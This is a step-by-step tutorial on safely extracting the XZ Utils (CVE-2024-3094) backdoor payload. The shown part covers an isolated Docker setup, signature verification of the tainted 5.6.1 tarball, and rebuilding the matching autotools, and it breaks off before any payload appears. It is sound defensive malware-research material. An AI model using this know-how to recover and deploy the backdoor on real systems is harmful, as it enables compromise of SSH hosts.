
How to extract the XZ backdoor malware payload

Documents a reproducible, step-by-step process to safely extract the malware payload from the tainted XZ Utils release tarball.

https://hackmd.io/@cve-2024-3094/how-to-extract-the-malware-payload


Prerequisites

The following conditions must be met to run this tutorial:

  • A host machine with any of the following virtualization solutions ready:
    • A container runtime (e.g. Docker Engine/Podman)
    • A virtual machine hypervisor (e.g. QEMU-KVM/Oracle VirtualBox/VMware Player or Workstation)
  • Internet access is available on the host machine.

In this tutorial the Docker container runtime is used, though other virtualization solutions may be used with minor modifications to the process.

Note that the command examples in the following sections assume that you're using a Bash shell; you may need to translate them to the equivalent variants for your specific shell when running them.

Reproducible environment

The following environment was used to reproduce this tutorial during the writing process:

  • Host operating system: Ubuntu 24.04
  • Guest operating system (to actually do the extraction): Ubuntu 22.04
  • Docker Engine: 24.0.5

Launch a text terminal emulator application

Most of the following steps need to be executed in a text terminal, so launch your preferred text terminal emulator application to do so.

Create a working directory for this specific tutorial

To avoid accidentally using the tainted software, we should store all files that may be malicious in a dedicated folder (especially not your Downloads folder).

Use your preferred file manager application or run the following shell command to do so:

mkdir '/path/to/the/hosting/dir/CVE-2024-3094 vulnerability research'

Switch to the working directory

Run the following command to switch your working directory in order to minimize the keystrokes required to refer to files in that directory:

cd '/path/to/the/hosting/dir/CVE-2024-3094 vulnerability research'

Fetch the Ubuntu 22.04 Docker container image from the container registry

To reduce the time required for the Update the container system to avoid zero-day exploits step during each tutorial reproduction session, fetch the latest Ubuntu 22.04 container image from the Docker registry by running the following command as root:

docker pull ubuntu:22.04

The command should produce output similar to one of the following, depending on whether you already have the latest specified container image downloaded to your local host:

22.04: Pulling from library/ubuntu
062e51aa1fb4: Pull complete 
Digest: sha256:5cd569b792a8b7b483d90942381cd7e0b03f0a15520d6e23fb7a1464a25a71b1
Status: Downloaded newer image for ubuntu:22.04
docker.io/library/ubuntu:22.04

22.04: Pulling from library/ubuntu
Digest: sha256:77906da86b60585ce12215807090eb327e7386c8fafb5402369e421f44eff17e
Status: Image is up to date for ubuntu:22.04
docker.io/library/ubuntu:22.04

Note:

If you are in a networking environment where the Internet access is only available through a specific HTTP/HTTPS proxy service, you need to merge the following JSON dictionary keys and values with your Docker Daemon configuration file:

{
    "proxies": {
        "http-proxy": "_http_proxy_url_",
        "https-proxy": "_https_proxy_url_",
        "no-proxy": "*.local,127.0.0.0/8,192.168.0.0/16,10.0.0.0/8,172.16.0.0/12"
    }
}

and restart the Docker daemon to let the configuration change take effect. Refer to the Configure Docker to use a proxy server | Docker Docs official documentation for more information.
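
For example, on a host where the Docker Engine is managed by systemd (an assumption; adjust for your init system), the restart could look like this:

# Restart the Docker daemon so the proxy configuration takes effect
systemctl restart docker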

Launch a Docker container to avoid accidentally compromising the system used to inspect the malicious payload

Security implications:

It would be even safer to create a virtual machine for this case, as the isolation between the guest and the host system is stronger.

Even this isn't 100% safe, though, given that virtual machine escape exploits still exist. Doing the work on another non-critical host machine with a likely malware-incompatible CPU architecture (like ARM or RISC-V) would be your safest bet.

Run the following commands as root to launch an ephemeral Docker container for the inspection of the malicious payload:

docker_run_opts=(
    # Destroy the container after exiting the run session
    --rm
    
    # Allows the interactive mode bash shell to properly run
    --interactive
    --tty
    
    # Mount the working directory under the /project directory
    # in the container for easy access to the tainted XZ Utils
    # files via the bind-mount Docker volume mechanism
    --mount "type=bind,source=${PWD},destination=/project"
    

    # Configure host-facing human-readable container name
    --name cve-2024-3094
    
    # Configure guest-facing human-readable container name
    # This is to prevent accidental out-of-scope usage of
    # this container, which should only be used in the scope
    # of this tutorial
    --hostname cve-2024-3094
    
    # Configure a custom DNS server instead of what the host is
    # currently using to avoid disclosing such info to the malware
    # 1.1.1.1 is a public DNS service hosted by Cloudflare
    --dns 1.1.1.1
)
docker run "${docker_run_opts[@]}" ubuntu:22.04

Note:

The "${docker_run_opts[@]}" notation is in [Bash's shell parameter expansion syntax](https://www.gnu.org/software/bash/manual/html_node/Shell-Parameter-Expansion.html), which will be replaced by each of the double-quoted array members, separated by a space character after expansion. You can prepend the echo command before a command containing such notation (e.g. echo "${array[@]}") to preview the expanded result.
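
For instance, to preview how the docker run invocation above would expand:

# Print the fully-expanded command line instead of running it
echo docker run "${docker_run_opts[@]}" ubuntu:22.04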

Note:

If you're in a network environment where Internet access is only available through an HTTP/HTTPS proxy, run the following commands before the invocation of the docker run command:

  • docker_run_opts+=(--env http_proxy=__HTTP_PROXY_URL__)
  • docker_run_opts+=(--env https_proxy=__HTTPS_PROXY_URL__)

You may omit the part of the --env docker run command-line option's argument after the equal sign (not including the trailing closing parenthesis) if you already have the environment variables set on your host machine.

Note:

By default the Ubuntu container image has the timezone set to Coordinated Universal Time (UTC); if you're in a different timezone you can run the following command to fix the timezone settings:

docker_run_opts+=(--env TZ=_std__offset_)

Replace the std placeholder of the TZ environment variable's value with a suitable time zone abbreviation; refer to List of time zone abbreviations - Wikipedia for the full list, or simply use LOC, as the abbreviation isn't really used for anything other than being displayed to the user, so it doesn't matter much.

Replace the offset placeholder of the TZ environment variable's value with the time value you must add to the local time to get the UTC time. It has a [+|-]hh[:mm[:ss]] format where a square bracket pair denotes an optional field and the pipe (|) character denotes possible alternatives; for the hh, mm, and ss fields leading zeros may also be omitted.

For example, for users in Taiwan (UTC+8) a proper TZ value would be CST-8, as the time zone abbreviation is CST and minus 8 hours must be applied to the local time to get the UTC time.
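
As a concrete sketch of the Taiwan example above, the option would be appended like this:

# Set the container's timezone to Taiwan's (UTC+8)
docker_run_opts+=(--env TZ=CST-8)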

Security implications:

You may not need to run the docker run command as root if you've set the proper permissions to access the Docker daemon control socket; however, this setup also has security implications that need to be taken care of.

Warning:

From this point on, it is recommended to access all data from the potential evil actor only from within the container/virtual machine's isolation, as such data may contain malicious logic that could compromise your host system.

(Optional) Switch to use a local Ubuntu software repository mirror service

By default the Ubuntu Docker container image has the archive.ubuntu.com software archive URL configured in the APT software package management system's software sources list; however, the servers behind this address are located in England and the United States (according to IP address geolocation lookup results):

$ dig +short archive.ubuntu.com @1.1.1.1
91.189.91.83
91.189.91.82
185.125.190.36
91.189.91.81
185.125.190.39

IP address geolocation lookup result for the "91.189.91.81" IP address, indicating that the server is likely in the United States

IP address geolocation lookup result for the "185.125.190.36" IP address, indicating that the server is likely in England

and thus the package download speed will be limited if you don't live in one of these regions.

To fix this problem we can switch to your country's representative mirror service (using the country_code.archive.ubuntu.com domain, where country_code is an ISO 3166-1 alpha-2 code) or one of your local regular mirror services of the Ubuntu software repository archives by running the following commands as root:

read_opts=(
    # Specify input prompt to present to the user
    -p 'Input the domain name of your local Ubuntu software archive mirror service: '
    
    # Don't allow backslash sequences in the input data to be
    # interpreted
    -r
)
read "${read_opts[@]}" archive_mirror_domain

# FIXME: The domain name validation regex is not rigorous, considering
# that internationalized domains like 你好.世界 exist (which they do)
regex_domain_name='^.+\..+$'
if ! [[ "${archive_mirror_domain}" =~ ${regex_domain_name} ]]; then
    printf \
        'Error: The specified domain name is invalid.\n' \
        1>&2
else
    now_timestamp="$(date +%Y%m%d-%H%M%S)"
    sed_opts=(
        # Modify the content of the input file in-place, while creating a
        # backup file in order to revert the changes without hassle.
        --in-place=".orig.${now_timestamp}"

        # Use extended regular expression(E.R.E.) as it is more robust than
        # the default basic regular expression(B.R.E.) variant
        --regexp-extended

        # Apply the sed expression to replace the default software
        # repository domain with your local region's Ubuntu software
        # archive mirror domain:
        # Replace every string that matches the `//[^/]*/ubuntu/` regular
        # expression to `//${archive_mirror_domain}/ubuntu/`
        --expression="s@//[^/]*/ubuntu/@//${archive_mirror_domain}/ubuntu/@"
    )
    sed "${sed_opts[@]}" /etc/apt/sources.list
fi
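
As an optional sanity check (a suggestion, not strictly required), you can confirm that the mirror domain was actually substituted into the sources list:

# Look for the literal mirror domain in the APT sources list
grep --fixed-strings "${archive_mirror_domain}" /etc/apt/sources.list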

As the software sources are modified we need to refresh the APT software package management system's local cache to make the modification effective; running the following command as root should do so:

apt update

Update the container system to avoid zero-day exploits

As the release archive to inspect is potentially dangerous, we should fully update our container system to reduce the possibility that a zero-day exploit may be used to compromise our container system (and in turn, our working host system).

Run the following command as root to achieve so:

apt full-upgrade

Security implication:

Note that the currently running container process (the Bash shell you're pasting commands into) is still unpatched and may still be exploited by the attacker; to mitigate this risk, launch a subshell by running the following command:

bash

If you want to skip this mitigation, please at least avoid source-ing or .-ing any scripts or non-script files in the project.

Change the working directory to the in-container working directory

Run the following command to change the working directory to the bind-mounted working directory:

cd /project

Retrieve the tainted upstream release archives

The upstream release archives are not accessible right now as GitHub has disabled access to the upstream project's Git repository.

Screenshot of the "This repository has been disabled." error page of the upstream GitHub repository

Fortunately, with the help of the Wayback Machine and some other third-party backups we are still able to retrieve them as well as the PGP signature that can be used to verify its authenticity (to the extent of an incomplete PGP web of trust).

You may locate the files in the Wayback Machine search results page for the https://github.com/tukaani-project/xz/releases/download/* URLs and some other sources, or simply download the files from the following curated list using your preferred web browser application:

Note:

  • We specifically chose NOT to use the non-XZ-compressed archive format variants of the XZ Utils release archives, as the evil actor definitely has a deeper understanding of the XZ compression format, to the extent that they may (in highly unlikely circumstances) have crafted the release archive in a way that triggers an unknown vulnerability when one tries to extract it.
  • Choose the earliest archived version in the Wayback Machine snapshot selection interface (the calendar view), as later versions may not be the original.

Verify the authenticity of the tainted XZ Utils release archive

As the XZ Utils release archives fetched from the Wayback Machine and other backup sources aren't necessarily unmodified or even released by the evil actor themselves, we must verify their authenticity.

We can achieve this by using the Pretty Good Privacy (PGP) public key of the evil actor as well as the PGP signature files distributed along with the release archives.

Install the runtime dependencies required for verifying a PGP-signed document

First, we need to install the software required for verifying PGP-signed documents. The GNU Privacy Guard (GnuPG) is the one mainly used on GNU+Linux operating systems; let's install it by running the following command as root:

apt install gnupg

Fetch a copy of the potential evil actor's PGP public key

We also need to have a copy of the PGP public key of the evil actor, which can be obtained from the Wayback Machine.

Simply copying the entire -----*PUBLIC KEY BLOCK----- (including the beginning and ending marker lines) and saving the content to a new potential-evil-actor.pubkey file in the working directory using a plaintext editor should suffice.
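
If you prefer to stay in the terminal, here is a hypothetical sketch of saving the copied key block with a heredoc (the body line is a placeholder you must replace with the actual block):

cat >potential-evil-actor.pubkey <<'EOF'
_paste_the_entire_public_key_block_here_including_the_marker_lines_
EOF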

Import the evil actor's PGP public key to the GnuPG keyring

To verify documents signed with PGP we must first import the evil actor's PGP public key into the GnuPG keyring; running the following command will do so:

gpg_opts=(
    # Import the specified PGP public key into your default keyring
    --import
)
gpg "${gpg_opts[@]}" potential-evil-actor.pubkey

The following output should be displayed:

gpg: key 59FCF207FEA7F445: 1 signature not checked due to a missing key
gpg: /root/.gnupg/trustdb.gpg: trustdb created
gpg: key 59FCF207FEA7F445: public key "Jia Tan <jiat0218@gmail.com>" imported
gpg: Total number processed: 1
gpg:               imported: 1
gpg: no ultimately trusted keys found

Note:

  • The gpg: key 59FCF207FEA7F445: 1 signature not checked due to a missing key warning message is due to the fact that the public key of the unknown person who signed the evil actor's PGP keypair is not in your keyring, which is an expected result as the keyring did not exist in the first place.
  • The gpg: no ultimately trusted keys found warning message is due to the fact that the PGP web of trust is missing for this particular public key, which is expected: the web of trust requires that you have your own private/public key pair and have signed (trusted) either the evil actor's keypair, or other people's keypairs who (directly or indirectly) have signed the evil actor's keypair, neither of which exists in the first place. How to satisfy such a trust model to get rid of the warning, however, is out of the scope of this tutorial.

Verify the authenticity of the PGP-signed XZ Utils release archive

Run the following command to verify the release archive's authenticity:

gpg_opts=(
    # Verify the authenticity of the xz-5.6.1.tar.bz2 file using the
    # detached PGP signature file xz-5.6.1.tar.bz2.sig(and the signer's
    # PGP public key in your keyring)
    --verify xz-5.6.1.tar.bz2.sig xz-5.6.1.tar.bz2
)
gpg "${gpg_opts[@]}"

The following output should be displayed:

gpg: Signature made Sat Mar  9 08:22:45 2024 UTC
gpg:                using RSA key 22D465F2B4C173803B20C6DE59FCF207FEA7F445
gpg: Good signature from "Jia Tan <jiat0218@gmail.com>" [unknown]
gpg: WARNING: This key is not certified with a trusted signature!
gpg:          There is no indication that the signature belongs to the owner.
Primary key fingerprint: 22D4 65F2 B4C1 7380 3B20  C6DE 59FC F207 FEA7 F445

Note:

  • The gpg: Good signature from "_display_name_ <_email_address_>..." output indicates that the PGP-signed file is successfully verified. The [unknown] part at the end of that line indicates that the trustworthiness of the keypair that signed the file is determined to be "unknown" according to the PGP web of trust.
  • The WARNING: This key is not certified with a trusted signature! There is no indication that the signature belongs to the owner. warning message is due to the fact that the PGP web of trust is missing for the evil actor's public key; refer to the gpg: no ultimately trusted keys found warning message note above for more info.

Now we know that the release archive is indeed signed by the potential evil actor, so the result of the further extraction process should be reproducible by everyone, as long as they also retrieve the same file.
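
To make the "same file" condition easy for others to cross-check, you may additionally record the archive's cryptographic checksum (a suggestion on top of the PGP verification above):

# Record the exact bytes of the archive that was analyzed
sha256sum xz-5.6.1.tar.bz2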

Install the software needed for extracting the tainted XZ Utils release archive

Now we shall extract the tainted XZ Utils release archive. According to the .tar.bz2 filename extension the release archive is a bzip2-compressed tarball; you can run the following command as root to install the software needed for extracting such files:

bzip_tarball_extraction_dependency_pkgs=(
    # For uncompressing the bzip2 compressed file
    bzip2
    
    # For extracting the plain tar archive file
    tar
)
apt install "${bzip_tarball_extraction_dependency_pkgs[@]}"

Extract the tainted XZ Utils release archive

Run the following command to extract the XZ Utils release archive:

tar_opts=(
    # Specify to uncompress and extract the specified archive
    --extract
    --file xz-5.6.1.tar.bz2
)
tar "${tar_opts[@]}"

Note:

It is recommended to use in-container utilities to inspect the files from the potential evil actor, as you may otherwise unintentionally run the programs inside them (via the GUI double-click mechanism) or have your system compromised through an exploited vulnerability in one of your host system's components.

Clone the upstream project's Git repository to the local host

We can rebuild the unmodified aforementioned build system files from the source tree checked out from the upstream Git repository to compare what the evil actor actually did to the files.

The first step is to install the Git version control system software; you can run the following command as root to do so:

apt install git

then run the following command to clone the upstream Git repository to the local host and check out the 5.6.1 version from it:

git_clone_opts=(
    # Limit the history fetch to only 1 commit to conserve
    # storage space, Internet data usage, and fetch time
    --depth=1
    
    # Checkout the v5.6.1 tag only
    --branch v5.6.1
)
git clone "${git_clone_opts[@]}" \
    https://git.tukaani.org/xz.git \
    xz-git

Let's make sure the working directory is the initial one, as we no longer need to perform Git operations:

cd /project

Read the XZ Utils installation document

Now we can read the installation document (INSTALL) in the XZ Utils source tree; however, we need a pager utility to do so. As the pager utility available in the Ubuntu container by default is more, which is limited in browsing features (e.g. page up), let's install the much more capable less pager by running the following command as root:

apt install less

Security implication:

Never use the cat command to read an untrusted file: the file may contain escape codes that may be interpreted by your terminal, with unintended or even malicious results. Use a pager utility (e.g. less) to mitigate such risks.

Then we can read the installation document in the XZ Utils source tree by running the following command:

less xz-git/INSTALL

Note:

Press the q key on your keyboard to leave the less pager program.

Determine the software used to generate the build system files

According to the Preface section of the XZ Utils installation document, XZ Utils uses the GNU build system to build the software, which includes (but is not limited to) the following software components:

  • GNU Autoconf
    For automatically generating a build configuration program suitable for usage in many processor architectures and operating systems.
  • GNU Automake
    A tool for automatically generating Makefile.in files compliant with the GNU Coding Standards.
  • GNU Libtool
    For hiding the complexity of using shared libraries behind a consistent, portable interface.

(The XZ Utils software also implements the CMake build system as an alternative; however, since the malware injection was not made into that portion, it is out of scope for this tutorial.)

It is more helpful to generate the build system files using the exact same versions of the software that the evil actor did, as that introduces less noise during the content comparison (to figure out what the evil actor actually did to inject the malicious code).

We can determine the version of the GNU Autoconf build tool used by the software (assuming that it is not obfuscated by the evil actor) by checking the heading comment of the build configuration program in the released source code, by running the following command:

head_opts=(
    # Only show 3 lines instead of the default 10
    --lines=3
)
head "${head_opts[@]}" xz-5.6.1/configure

which should produce the following output, indicating that the GNU Autoconf version used for building the build files is likely 2.72:

#! /bin/sh
# Guess values for system-dependent variables and create Makefiles.
# Generated by GNU Autoconf 2.72 for XZ Utils 5.6.1.

We can determine the version of the GNU Automake build tool used by the software (assuming that it is not obfuscated by the evil actor) by checking the heading comment of the Makefile input file in the released source code, by running the following command:

head_opts=(
    # Only show 3 lines instead of the default 10
    --lines=3
)
head "${head_opts[@]}" xz-5.6.1/Makefile.in

which should produce the following output, indicating that the GNU Automake version used for building the build files is likely 1.16.5:

# Makefile.in generated by automake 1.16.5 from Makefile.am.
# @configure_input@

We can determine the version of GNU Libtool used by the software (assuming that it is not obfuscated by the evil actor) by checking the heading comment of the build-aux/ltmain.sh file in the released source code, by running the following command:

head_opts=(
    # Only show 5 lines instead of the default 10
    --lines=5
)
head "${head_opts[@]}" xz-5.6.1/build-aux/ltmain.sh

which should produce the following output, indicating that the GNU Libtool version used for building the build files is likely a modified version of 2.4.7.4 (with the revision fingerprint 1ec8f):

#! /usr/bin/env sh
## DO NOT EDIT - This file generated from ./build-aux/ltmain.in
##               by inline-source v2019-02-19.15

# libtool (GNU libtool) 2.4.7.4-1ec8f-dirty

After checking the revision history of the GNU Libtool project you can see that the actual version is the fourth revision beyond the 2.4.7 version tag (as the commit hash (1ec8f) matches). The -dirty version string suffix indicates that the libtool source may have additional unknown changes that deviate from the 1ec8f revision.
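
Once the GNU Libtool repository has been cloned later in this tutorial, you can cross-check this reasoning with a revision count (a sketch, assuming the upstream release tag is named v2.4.7 and your fetched history is deep enough to contain it):

git_rev_list_opts=(
    # Print only the number of revisions in the range instead of
    # listing them; the result should be 4 if the reasoning holds
    --count
)
git -C libtool-git rev-list "${git_rev_list_opts[@]}" v2.4.7..1ec8fa2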

Upon inspecting the configure.ac GNU Autoconf input file we can notice that the XZ Utils software also makes use of the GNU Gettext internationalization (I18N) support library:

dnl Support for _REQUIRE_VERSION was added in gettext 0.19.6. If both
dnl _REQUIRE_VERSION and _VERSION are present, the _VERSION is ignored.
dnl We use both for compatibility with other programs in the Autotools family.
echo
echo "Initializing gettext:"
AM_GNU_GETTEXT_REQUIRE_VERSION([0.19.6])
AM_GNU_GETTEXT_VERSION([0.19.6])
AM_GNU_GETTEXT([external])

As GNU Gettext also generates build system files in the source tree, we must build the exact same GNU Gettext version the potential evil actor used as well, which can be found by inspecting the header of the xz-5.6.1/m4/gettext.m4 file by running the following commands:

head_opts=(
    # Only show 1 line instead of the default 10
    --lines=1
)
head "${head_opts[@]}" xz-5.6.1/m4/gettext.m4

According to the following output, the GNU Gettext version used to build XZ Utils 5.6.1 seems to be 0.22.4:

# gettext.m4 serial 78 (gettext-0.22.4)

Install the software dependencies to generate the build system files

While the Ubuntu software distribution may provide these software packages in the required versions, it may also introduce additional changes of its own that would complicate the difference comparison process, so we'll have to build and install this software from source manually.

GNU Autoconf

The installation of the GNU Autoconf software can be done by following the Downloading Autoconf section of the Autoconf project page to locate the download URLs of the 2.72 release archive and its respective PGP signature file and download them to the working directory using your web browser.

Then, as usual, verify that the release archive we've downloaded was actually made by the Autoconf project maintainer. We can determine who actually signed the release archive by running the following command:

gpg_opts=(
    # Verify the authenticity of the autoconf-2.72.tar.xz file using the
    # detached PGP signature file autoconf-2.72.tar.xz.sig(and the
    # signer's PGP public key in your keyring which does not exist at
    # the moment)
    --verify autoconf-2.72.tar.xz.sig autoconf-2.72.tar.xz
)
gpg "${gpg_opts[@]}"

You should see the following error message from GnuPG:

gpg: Signature made Fri Dec 22 19:13:21 2023 UTC
gpg:                using RSA key 82F854F3CE73174B8B63174091FCC32B6769AA64
gpg: Can't check signature: No public key

The PGP signature can't be checked as we don't have the signer's public key in our PGP keyring; we can retrieve the public key using the key's fingerprint (82F854F3CE73174B8B63174091FCC32B6769AA64) from the previous output by running the following command:

gpg_opts=(
    # Specify the keyserver to fetch the public key from.
    # 
    # GnuPG does have one set by Debian (hkps://keys.openpgp.org);
    # however, it didn't work reliably during the writing of this
    # tutorial, thus another popular one is used instead.
    --keyserver keyserver.ubuntu.com
    
    # Import the keys with the given keyIDs from a keyserver
    --receive-keys 0x82F854F3CE73174B8B63174091FCC32B6769AA64
)
gpg "${gpg_opts[@]}"

You should see the following command output:

gpg: key 91FCC32B6769AA64: public key "Zack Weinberg <zackw@panix.com>" imported
gpg: Total number processed: 1
gpg:               imported: 1

which indicates that the one who signed the release is supposed to be Zack Weinberg <zackw@panix.com>. According to the Maintainers section of the Autoconf project page, the project maintainers seem to be:

which is weird, as Zack isn't in the list. However, by checking the summary page of Autoconf's Git repository we can verify that it is indeed Zack Weinberg who prepared the 2.72 release:

The screenshot of the recent commits of the GNU Autoconf source repository; "Zack Weinberg" is listed as the author who wrote the "Finalize NEWS for release 2.72." revision (outlined in red)

We can now proceed to verify the released GNU Autoconf source archive:

gpg_opts=(
    # Verify the authenticity of the autoconf-2.72.tar.xz file using the
    # detached PGP signature file autoconf-2.72.tar.xz.sig(and the
    # signer's PGP public key in your keyring)
    --verify autoconf-2.72.tar.xz.sig autoconf-2.72.tar.xz
)
gpg "${gpg_opts[@]}"

Note:

As mentioned in the Verify the authenticity of the tainted XZ Utils release archive section, the following output line indicates that the PGP-signed file is verified successfully:

gpg: Good signature from "DISPLAY NAME <EMAIL-ADDRESS>" [*]

We can now proceed to extract the Autoconf source archive, but first we need to install the (hopefully not malicious :P) XZ Utils software required to do so; run the following command as root:

xz_tarball_uncompress_dependency_pkgs=(
    xz-utils
)
apt install "${xz_tarball_uncompress_dependency_pkgs[@]}"

Then run the following command to extract the Autoconf source archive:

tar_opts=(
    # Specify to uncompress and extract the specified archive
    --extract
    --file autoconf-2.72.tar.xz
)
tar "${tar_opts[@]}"

Now we can try building Autoconf from source. As the build configuration program (autoconf-2.72/configure) creates build files in your working directory, let's switch the working directory to the Autoconf source directory to avoid writing files outside of it:

cd autoconf-2.72

Then we can iteratively run the build configuration program to satisfy the build requirements and finally generate the Makefile to actually build and install the software. Run the following command to do so:

./configure

Autoconf's build configuration program prints the following error message, which indicates that it requires the GNU M4 software to be installed:

configure: error: no acceptable m4 could be found in $PATH.
GNU M4 1.4.8 or later is required; 1.4.16 or newer is recommended.
GNU M4 1.4.15 uses a buggy replacement strstr on some systems.
Glibc 2.9 - 2.12 and GNU M4 1.4.11 - 1.4.15 have another strstr bug.

We can install it by running the following command as root:

apt install m4

Now we can run the build configuration program again:

./configure

If you see the following output and the Makefile file appears in the source tree, it means that the build configuration of the GNU Autoconf software has finished successfully:

configure: creating ./config.status
config.status: creating tests/atlocal
config.status: creating Makefile
config.status: creating lib/version.m4
config.status: executing tests/atconfig commands

You are about to use an experimental version of Autoconf.  Be sure to
read the relevant mailing lists, most importantly <autoconf@gnu.org>.

Below you will find information on the status of this version of Autoconf.

    ...stripped...

We need the GNU Make software to read the Makefile and build the GNU Autoconf software; run the following command as root to install it:

apt install make

Now we can start building the GNU Autoconf software by running the following command:

number_of_cpu_threads="$(nproc)"
make_opts=(
    # Speed-up the build process by using multiple process at the same
    # time
    --jobs="${number_of_cpu_threads}"
)
make "${make_opts[@]}"

Note:

If the command's exit status code is zero, the build is successful. Run the following command right after the make command's invocation to verify this:

echo "${?}"

Then run the following command to install the built GNU Autoconf software to the system:

make install

After the installation of the GNU Autoconf software you should have the autoconf command in your command search PATHs (/usr/local/bin to be specific). You may check the version of the installation by running the following command:

autoconf --version
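
The first line of the output should report the version we determined earlier, along the lines of the following (the remaining copyright and license lines are omitted here):

autoconf (GNU Autoconf) 2.72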

Let's run the following command to switch the working directory back to the initial one, as we have no more business with the Autoconf source tree:

cd /project

GNU Automake

The installation of the GNU Automake software can be started by locating the download URLs of the 1.16.5 release archive and its respective PGP signature file and downloading them to the working directory using your web browser.

Then, as usual, verify that the release archive we downloaded was actually made by the GNU Automake project maintainer. We can determine who actually signed the release archive by running the following command:

gpg_opts=(
    # Verify the authenticity of the automake-1.16.5.tar.xz file using
    # the detached PGP signature file automake-1.16.5.tar.xz.sig(and the
    # signer's PGP public key in your keyring which does not exist at
    # the moment)
    --verify automake-1.16.5.tar.xz.sig automake-1.16.5.tar.xz
)
gpg "${gpg_opts[@]}"

You should see the following error message from GnuPG:

gpg: Signature made Mon Oct  4 03:23:30 2021 UTC
gpg:                using RSA key 155D3FC500C834486D1EEA677FD9FCCB000BEEEE
gpg: Can't check signature: No public key

The PGP signature can't be checked as we don't have the signer's public key in our PGP keyring; we can retrieve the public key using the key's fingerprint from the previous output by running the following command:

gpg_opts=(
    # Specify the keyserver to fetch the public key from.
    # 
    # GnuPG does have one set by Debian (hkps://keys.openpgp.org);
    # however, it didn't work reliably during the writing of this
    # tutorial, thus another popular one is used instead.
    --keyserver keyserver.ubuntu.com
    
    # Import the keys with the given keyIDs from a keyserver
    --receive-keys 0x155D3FC500C834486D1EEA677FD9FCCB000BEEEE
)
gpg "${gpg_opts[@]}"

It should have the following output:

gpg: key 7FD9FCCB000BEEEE: public key "Jim Meyering <jim@meyering.net>" imported
gpg: Total number processed: 1
gpg:               imported: 1

Note:

If you still can't retrieve the public key, the connection might have been blocked by your network's firewall; you could also try using the hkp://keyserver.ubuntu.com:80 keyserver, which should get through such a hostile networking environment.
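
For example, the fallback retrieval for the key above would look like this:

gpg_opts=(
    # Use the port-80 HKP endpoint of the keyserver, which most
    # firewalls allow through
    --keyserver hkp://keyserver.ubuntu.com:80
    
    # Import the keys with the given keyIDs from a keyserver
    --receive-keys 0x155D3FC500C834486D1EEA677FD9FCCB000BEEEE
)
gpg "${gpg_opts[@]}"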

As shown by the GNU Automake project page, Jim Meyering is indeed the one who released the packages, so the public key we've fetched here is probably legit:

Screenshot of the "Latest News" section of the GNU Automake project page, meyering(Jim Meyering) can be found in the post author information (outlined in red)

We can now proceed to verify the 1.16.5 GNU Automake source archive:

gpg_opts=(
    # Verify the authenticity of the automake-1.16.5.tar.xz file using
    # the detached PGP signature file automake-1.16.5.tar.xz.sig(and the
    # signer's PGP public key in your keyring)
    --verify automake-1.16.5.tar.xz.sig automake-1.16.5.tar.xz
)
gpg "${gpg_opts[@]}"

Note:

As mentioned in the Verify the authenticity of the tainted XZ Utils release archive section, the following output line indicates that the PGP-signed file is verified successfully:

gpg: Good signature from "DISPLAY NAME <EMAIL-ADDRESS>" [*]

We can now proceed to extract the GNU Automake source archive, run the following command to do so:

tar_opts=(
    # Specify to uncompress and extract the specified archive
    --extract
    --file automake-1.16.5.tar.xz
)
tar "${tar_opts[@]}"

Now we can try building Automake from source. As the build configuration program (automake-1.16.5/configure) creates build files in your working directory, let's switch the working directory into the GNU Automake 1.16.5 source directory to avoid writing files outside of it:

cd automake-1.16.5

Then we can iteratively run the build configuration program to satisfy the build requirements and finally generate the Makefile to actually build and install the software. Run the following command to do so:

./configure

If you see the following output, the build configuration should be completed without errors:

configure: creating ./config.status
config.status: creating Makefile
config.status: creating pre-inst-env

Note:

The build configuration program does print some warning messages; however, all of them seem to only affect the automated software testing of the GNU Automake software, which we don't really need in this tutorial, so let's let them slide.

Now we can start building the GNU Automake software by running the following command:

number_of_cpu_threads="$(nproc)"
make_opts=(
    # Speed-up the build process by using multiple process at the same
    # time
    --jobs="${number_of_cpu_threads}"
)
make "${make_opts[@]}"

If the command's exit status code is zero, the build is successful. Run the following command right after the make command's invocation to verify this:

echo "${?}"

Then run the following command to install the built GNU Automake software to the system:

make install

After the installation of the GNU Automake software you should have the automake command in your command search PATHs (/usr/local/bin). You may check the version of the installation by running the following command:

automake --version

Let's turn our heads back to the initial working directory, as we no longer have business with the Automake source tree:

cd /project

GNU Libtool

The installation of the GNU Libtool software can be started by locating the download URL of the 2.4.7.4 release archive, until you notice that there's no such release version called 2.4.7.4:

The Downloads section of the GNU Libtool home page shows that the latest released version is "2.4.7"

The release package download website shows that the version of the latest release tarballs is also "2.4.7"

According to the full version string 2.4.7.4-1ec8f-dirty we found earlier, it appears that the .4 part of the GNU Libtool version string indicates a development revision that has deviated from the 2.4.7 release by 4 revisions and has the revision fingerprint 1ec8f. By searching the revisions committed to the repository after the 2.4.7 release and matching the revision fingerprints, we can find that the GNU Libtool software that created the build system files seems to be based on the "libtool: passthru '-Werror' flags" revision.

We can fetch the GNU Libtool source tree of this specific revision from the upstream Git repository URL listed in the Clone section of the libtool.git Git repository summary page by running the following commands:

git_clone_opts=(
    # Specify history fetch depth to 200 revisions from the default
    # branch's tip revision
    --depth=200
)
git clone "${git_clone_opts[@]}" \
    https://git.savannah.gnu.org/git/libtool.git \
    libtool-git
cd libtool-git
git checkout 1ec8fa2

Note:

If the following output is printed during the git checkout command, it indicates that your history fetch depth is too shallow:

error: pathspec '1ec8fa2' did not match any file(s) known to git

you can retry the operation after deepening the history fetch depth by running the following command after switching your working directory to the libtool-git directory:

git_fetch_opts=(
    # Specify history fetch depth to _more_revision_quantities_
    # revisions from the default branch's tip revision
    --depth=_more_revision_quantities_
)
git fetch "${git_fetch_opts[@]}"
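
For instance, with a hypothetical depth of 500 revisions (pick any value large enough to reach the 1ec8fa2 revision):

git_fetch_opts=(
    # Hypothetical deeper history fetch depth
    --depth=500
)
git fetch "${git_fetch_opts[@]}"
git checkout 1ec8fa2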

Now we can try building GNU Libtool from source. Unfortunately, the INSTALL installation document exists neither in the source tree nor at the URL referenced in the GNU Libtool 1ec8fa2 revision README:

Screenshot of the portion of the 1ec8fa2 revision GNU Libtool README document that mentions the INSTALL installation document (highlighted in yellow) and its on-website URL (outlined in red)

Screenshot of the page that is supposed to be the on-website GNU Libtool INSTALL document, which is an error message claiming "Path not found"

As a fallback option we refer to the current revision of the GNU Libtool README document, which now references the existing INSTALL installation document of the GNU Automake software instead:

A screenshot of the INSTALL document URL referenced by the current GNU Libtool software README document

As the source build bootstrapping program (libtool-git/bootstrap) expects to be run with your working directory under the source tree, be sure to change the working directory if you haven't done so in the previous step by running the following command:

cd /project/libtool-git

Then run the source build bootstrapping program by running the following command:

test -f configure || ./bootstrap

which should print the following error messages, indicating that we haven't satisfied its source build bootstrapping prerequisites:

bootstrap:   error: Prerequisite 'help2man' not found. Please install it, or
